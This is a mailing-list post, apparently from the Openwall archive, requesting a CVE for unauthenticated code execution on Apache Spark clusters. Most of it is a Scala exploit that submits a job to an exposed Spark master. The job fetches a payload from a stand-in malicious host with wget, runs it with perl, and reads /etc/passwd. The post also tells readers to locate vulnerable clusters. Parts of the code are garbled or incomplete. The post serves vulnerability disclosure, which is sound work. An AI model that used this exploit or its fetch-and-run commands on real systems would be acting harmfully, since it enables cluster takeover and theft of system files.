Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Thu, 16 Apr 2015 23:49:17 +0530
From: Akhil Das <>
Subject: CVE Request: Arbitary Code Execution in Apache Spark Cluster

# *Vendor Homepage*:
# *Software Link*:
# *Version*: All (0.0.x, 1.1.x, 1.2.x, 1.3.x)
# *Tested on*: 1.2.1

# Reference(s) :
# Exploit URL  :

# Spark clusters which are not secured with proper firewall can be taken
over easily (Since it does not have
# any authentication mechanism), this exploit simply runs arbitarty codes
over the cluster.
# All you have to do is, find a vulnerable Spark cluster (usually runs on
port 7077) add that host to your
# hosts list so that your system will recognize it (here its
spark-b-akhil-master pointing
# to in my /etc/hosts) and submit your Spark Job with arbitary
codes that you want to execute.

# Language: Scala

import org.apache.spark.{SparkContext, SparkConf}

 * Created by akhld on 23/3/15.

object Exploit {
  def main(arg: Array[String]) {
    val sconf = new SparkConf()
      .setMaster("spark://spark-b-akhil-master:7077") // Set this to the
vulnerable host URI
      .set("spark.cores.max", "2")
      .set("spark.executor.memory", "2g")
      .set("","") // Set this to your host from
where you launch the attack

    val sc = new SparkContext(sconf)

    val exploit = sc.parallelize(1 to 1).map(x=>{
       //Replace these with whatever you want to get executed
       val x = "wget https://mallicioushost/ -O".!
       val y = "perl".!"/etc/passwd").mkString

Please see this blog post if you need anymore information on this

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ